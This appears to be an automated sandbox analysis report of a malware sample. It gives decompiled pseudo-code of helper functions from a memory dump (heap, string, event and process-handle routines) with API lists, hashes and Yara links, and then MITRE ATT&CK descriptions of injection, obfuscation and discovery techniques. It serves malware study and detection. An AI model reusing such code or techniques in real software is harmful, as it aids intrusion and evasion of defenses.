				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E001C6B43(_t8, _t1);
				_t16 = E001C2049(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E001C86D8(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E001C2049(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E001C9039(_t16);
				}
				return _t18;
			}

0x001c7aa5
0x001c7aa6
0x001c7aa9
0x001c7aab
0x001c7ab6
0x001c7aba
0x001c7abf
0x001c7ac3
0x001c7acb
0x001c7ad0
0x001c7ad8
0x001c7ad8
0x001c7ae1
0x001c7ae5
0x001c7aeb
0x001c7aee
0x001c7af4
0x001c7af4
0x001c7afc
0x001c7afc
0x001c7b03
0x001c7b03
0x001c7b0e

APIs

Part of subcall function 001C2049: RtlAllocateHeap.NTDLL(00000000,00000000,001C7E50), ref: 001C2055

Part of subcall function 001C86D8: wsprintfA.USER32 ref: 001C8734

lstrlen.KERNEL32(001C23E9,00000000,00000000,00000027,00000005,00000000,00000000,001C96DA,74666F53,00000000,001C23E9,001CD00C,?,001C23E9), ref: 001C7AD0
lstrcpy.KERNEL32(00000000,00000000), ref: 001C7AF4
lstrcat.KERNEL32(00000000,00000000), ref: 001C7AFC

Strings

Soft, xrefs: 001C7AA6, 001C7ABF

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: 0529fcb6f894143f812a8c9a0a028647e75f3cfa4b895bab65bc977ce6b59b1e
Instruction ID: f817282db1176cebc62f3050a4ea00a34be7d5991c94e9c115472e25b032034e
Opcode Fuzzy Hash: 0529fcb6f894143f812a8c9a0a028647e75f3cfa4b895bab65bc977ce6b59b1e
Instruction Fuzzy Hash: 4C01F232100219A7C702AFA9DC88FEF3B6CEFB0341F04402AF90556151DB75CE95CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001C7C61, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001C7C61(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x001c7c6b
0x001c7c6f
0x001c7c84
0x001c7c88
0x001c7c8b
0x001c7c91
0x001c7c95
0x001c7c98
0x001c7ca3
0x001c7c9a
0x001c7c9a
0x001c7c9a
0x001c7c98
0x001c7cb1

APIs

memset.NTDLL ref: 001C7C6F
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,76712B62), ref: 001C7C84
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 001C7C91
CloseHandle.KERNEL32(?), ref: 001C7CA3

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: fd00a91a8f37a8bf86598779c56f6929736d63878dd9ced03bc0ee0456dda2c5
Instruction ID: 6c03dccbf1e5b9eac07175b2e58acc809bc6f9536967e52b5e4d8b75496a10d4
Opcode Fuzzy Hash: fd00a91a8f37a8bf86598779c56f6929736d63878dd9ced03bc0ee0456dda2c5
Instruction Fuzzy Hash: 93F03AB410430AAFD3106F22DC81D27BBACFB952E9B11892DF04681541D672EC199AB4

Uniqueness

Uniqueness Score: -1.00%

Function 001C8F10, Relevance: 6.0, APIs: 4, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E001C8F10(intOrPtr _a4) {
				void* _t2;
				void* _t4;
				long _t5;
				void* _t6;
				void* _t12;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x1cd26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				__imp__();
				if(_t2 != 5) {
					L4:
					if(_t12 <= 0) {
						_t4 = 0x32;
						return _t4;
					}
					L5:
					 *0x1cd25c = _t2;
					_t5 = GetCurrentProcessId();
					 *0x1cd258 = _t5;
					 *0x1cd264 = _a4;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x1cd254 = _t6;
					if(_t6 == 0) {
						 *0x1cd254 =  *0x1cd254 | 0xffffffff;
					}
					return 0;
				}
				if(_t2 > 0) {
					goto L5;
				}
				_t12 = _t2 - _t2;
				goto L4;
			}

0x001c8f18
0x001c8f20
0x001c8f25
0x00000000
0x001c8f7a
0x001c8f27
0x001c8f2f
0x001c8f37
0x001c8f37
0x001c8f77
0x00000000
0x001c8f77
0x001c8f39
0x001c8f39
0x001c8f3e
0x001c8f50
0x001c8f55
0x001c8f5b
0x001c8f63
0x001c8f68
0x001c8f6a
0x001c8f6a
0x00000000
0x001c8f71
0x001c8f33
0x00000000
0x00000000
0x001c8f35
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C6A90,?,?,00000001,?,?,?,001C807D,?), ref: 001C8F18
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,001C807D,?), ref: 001C8F3E
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,001C807D,?), ref: 001C8F5B
GetLastError.KERNEL32(?,00000001,?,?,?,001C807D,?), ref: 001C8F7A

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpen
String ID:
API String ID: 3184396577-0
Opcode ID: 056dc46254728615d97a82bed9f56eddef7f0075a73e7bc852af77c1c38f907f
Instruction ID: 15911642cb06a275875e923d82f69239a07bcfb781802414e0fa435941a78208
Opcode Fuzzy Hash: 056dc46254728615d97a82bed9f56eddef7f0075a73e7bc852af77c1c38f907f
Instruction Fuzzy Hash: 93F06D74694301EAE7209F24BD49F153FA2A765B80F50452DF14AC69E0EB70C8D2CF25

Uniqueness

Uniqueness Score: -1.00%

Function 001C970F, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001C970F() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x1cd26c; // 0x14c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x1cd2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x1cd26c; // 0x14c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x1cd238; // 0x2f50000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x001c970f
0x001c9716
0x001c9760
0x001c9762
0x001c9762
0x001c971a
0x001c9720
0x001c9725
0x001c9729
0x001c972f
0x001c9736
0x00000000
0x00000000
0x001c9738
0x001c973d
0x00000000
0x00000000
0x00000000
0x001c973d
0x001c973f
0x001c9747
0x001c974a
0x001c974a
0x001c9750
0x001c9757
0x001c975a
0x001c975a
0x00000000

APIs

SetEvent.KERNEL32(0000014C,00000001,001C8099), ref: 001C971A
SleepEx.KERNEL32(00000064,00000001), ref: 001C9729
CloseHandle.KERNEL32(0000014C), ref: 001C974A
HeapDestroy.KERNEL32(02F50000), ref: 001C975A

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 108e340e728c8c22d5c70e7a32fcdfd6a3984de3321edbc494d36c6e58beca60
Instruction ID: aee67fbac939cfeebf4b0bfea11df358c92229fd54b5addb26421c402836fc53
Opcode Fuzzy Hash: 108e340e728c8c22d5c70e7a32fcdfd6a3984de3321edbc494d36c6e58beca60
Instruction Fuzzy Hash: B7F03079716310DBD720AF75AD8CF467FACBB10B51B040624F809D7AA0DB24DC90EA90

Uniqueness

Uniqueness Score: -1.00%

Function 001C75E9, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E001C75E9(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x1cd32c; // 0x33497d8
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x1cd32c; // 0x33497d8
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x1cd030) {
					HeapFree( *0x1cd238, 0, _t8);
				}
				_t14[1] = E001C94A9(_v0, _t14);
				_t11 =  *0x1cd32c; // 0x33497d8
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x001c75e9
0x001c75e9
0x001c75f2
0x001c7602
0x001c7602
0x001c7607
0x001c760c
0x00000000
0x00000000
0x001c75fc
0x001c75fc
0x001c760e
0x001c7612
0x001c7624
0x001c7624
0x001c7634
0x001c7637
0x001c763c
0x001c7640
0x001c7646

APIs

RtlEnterCriticalSection.NTDLL(03349798), ref: 001C75F2
Sleep.KERNEL32(0000000A,?,001C23DE), ref: 001C75FC
HeapFree.KERNEL32(00000000,00000000), ref: 001C7624
RtlLeaveCriticalSection.NTDLL(03349798), ref: 001C7640

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 9736a82065b542bd472fdac92a4fe2b021b4f081694d94be8cb51876276710f1
Instruction ID: 40bd21bb4790a119df1b78813ae3fdf0167b0720577025022c80c18c84ce8924
Opcode Fuzzy Hash: 9736a82065b542bd472fdac92a4fe2b021b4f081694d94be8cb51876276710f1
Instruction Fuzzy Hash: E0F03A74A04540DBE7108B68ED49F067BA8BF24740B008019F806D66A1D770DC90CF26

Uniqueness

Uniqueness Score: -1.00%

Function 001CA5D6, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E001CA5D6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x1cd32c; // 0x33497d8
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x1cd32c; // 0x33497d8
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x1cd32c; // 0x33497d8
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x1ce836) {
					HeapFree( *0x1cd238, 0, _t10);
					_t7 =  *0x1cd32c; // 0x33497d8
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x001ca5d6
0x001ca5df
0x001ca5ef
0x001ca5ef
0x001ca5f4
0x001ca5f9
0x00000000
0x00000000
0x001ca5e9
0x001ca5e9
0x001ca5fb
0x001ca600
0x001ca604
0x001ca617
0x001ca61d
0x001ca61d
0x001ca626
0x001ca628
0x001ca62c
0x001ca632

APIs

RtlEnterCriticalSection.NTDLL(03349798), ref: 001CA5DF
Sleep.KERNEL32(0000000A,?,001C23DE), ref: 001CA5E9
HeapFree.KERNEL32(00000000), ref: 001CA617
RtlLeaveCriticalSection.NTDLL(03349798), ref: 001CA62C

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: fb8d5210e123c7389a2faef6938a3dc80a33bcad8b3ee99029130f213c4bbcab
Instruction ID: c48961c0c531900089f49dcaa7f7f84c3159014ffe9820bc597b0ae47a542f69
Opcode Fuzzy Hash: fb8d5210e123c7389a2faef6938a3dc80a33bcad8b3ee99029130f213c4bbcab
Instruction Fuzzy Hash: 94F0D4B8A00140DFE7198B24EC59F167BE5EF58705B44C029F906DBA71C734EC90CE26

Uniqueness

Uniqueness Score: -1.00%

Function 001C7F27, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001C7F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E001C2049(_t2);
				if(_t34 != 0) {
					_t30 = E001C2049(_t28);
					if(_t30 == 0) {
						E001C9039(_t34);
					} else {
						_t39 = _a4;
						_t22 = E001CA911(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E001CA911(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x001c7f27
0x001c7f31
0x001c7f33
0x001c7f39
0x001c7f39
0x001c7f42
0x001c7f46
0x001c7f52
0x001c7f56
0x001c7fca
0x001c7f58
0x001c7f58
0x001c7f5c
0x001c7f63
0x001c7f66
0x001c7f80
0x001c7f6f
0x001c7f6f
0x001c7f73
0x001c7f76
0x001c7f7b
0x001c7f7b
0x001c7f85
0x001c7fad
0x001c7fb3
0x001c7fb6
0x001c7f87
0x001c7f89
0x001c7f91
0x001c7f9c
0x001c7fa1
0x001c7fa1
0x001c7fbd
0x001c7fc4
0x001c7fc5
0x001c7fc5
0x001c7f56
0x001c7fd5

APIs

lstrlen.KERNEL32(00000000,00000008,?,766F11C0,?,?,001C15A4,?,?,?,?,00000102,001C11DA,?,?,00000000), ref: 001C7F33

Part of subcall function 001C2049: RtlAllocateHeap.NTDLL(00000000,00000000,001C7E50), ref: 001C2055

Part of subcall function 001CA911: StrChrA.SHLWAPI(?,0000002F), ref: 001CA91F
Part of subcall function 001CA911: StrChrA.SHLWAPI(?,0000003F), ref: 001CA929

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,001C15A4,?,?,?,?,00000102,001C11DA,?), ref: 001C7F91
lstrcpy.KERNEL32(00000000,00000000), ref: 001C7FA1
lstrcpy.KERNEL32(00000000,00000000), ref: 001C7FAD

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 859b43c7a59b592603c0bae088c8664e6d3aa357d88f5c5db0326d03fc622c3a
Instruction ID: c59af032973787665393e03400d15a9ba1564ee4ea188003e04a6fe4924eeb46
Opcode Fuzzy Hash: 859b43c7a59b592603c0bae088c8664e6d3aa357d88f5c5db0326d03fc622c3a
Instruction Fuzzy Hash: F521D232508215EBCB129FA5CC84FAE7FE9AF26384B15405DF9059B211D771DD108BE0

Uniqueness

Uniqueness Score: -1.00%

Function 001C7CB8, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001C7CB8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E001C2049(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x001c7ccd
0x001c7cd1
0x001c7cdb
0x001c7ce2
0x001c7ce5
0x001c7ce7
0x001c7cef
0x001c7cf4
0x001c7d02
0x001c7d07
0x001c7d11

APIs

lstrlenW.KERNEL32(004F0053,766F1499,?,00000008,033495A4,?,001C747C,004F0053,033495A4,?,?,?,?,?,?,001C6814), ref: 001C7CC8
lstrlenW.KERNEL32(001C747C,?,001C747C,004F0053,033495A4,?,?,?,?,?,?,001C6814), ref: 001C7CCF

Part of subcall function 001C2049: RtlAllocateHeap.NTDLL(00000000,00000000,001C7E50), ref: 001C2055

memcpy.NTDLL(00000000,004F0053,766F16D0,?,?,001C747C,004F0053,033495A4,?,?,?,?,?,?,001C6814), ref: 001C7CEF
memcpy.NTDLL(766F16D0,001C747C,00000002,00000000,004F0053,766F16D0,?,?,001C747C,004F0053,033495A4), ref: 001C7D02

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 4c0a648a9454217d4f22066e0efa38da7d46e2dc3b5c1b3c61fb43706d830862
Instruction ID: 15df05ffc965282a326510049e6b963519f9fb638f5ee2b8cf31d1a726074f04
Opcode Fuzzy Hash: 4c0a648a9454217d4f22066e0efa38da7d46e2dc3b5c1b3c61fb43706d830862
Instruction Fuzzy Hash: 26F03776900118BBCB11EFA8CC85DDE7BADEF18394B114066FD08D7212E731EA148BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C3CC8, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(03349B38,00000000,00000000,754294D8,001CA453,00000000), ref: 001C3CD8
lstrlen.KERNEL32(?), ref: 001C3CE0

Part of subcall function 001C2049: RtlAllocateHeap.NTDLL(00000000,00000000,001C7E50), ref: 001C2055

lstrcpy.KERNEL32(00000000,03349B38), ref: 001C3CF4
lstrcat.KERNEL32(00000000,?), ref: 001C3CFF

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 54553feb0fda647b3cc3e78d4be5c88d012c1d51e5775dd6f1f1fcb1217a87d5
Instruction ID: 82aaa1da51ce942e1be4fb3efd2eac492a2b499ab3c0a249c4056da164302835
Opcode Fuzzy Hash: 54553feb0fda647b3cc3e78d4be5c88d012c1d51e5775dd6f1f1fcb1217a87d5
Instruction Fuzzy Hash: 83E06D33501220A787119BE5AC48C6BBFADEF99651704442AFA0493520C724CC118BE1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
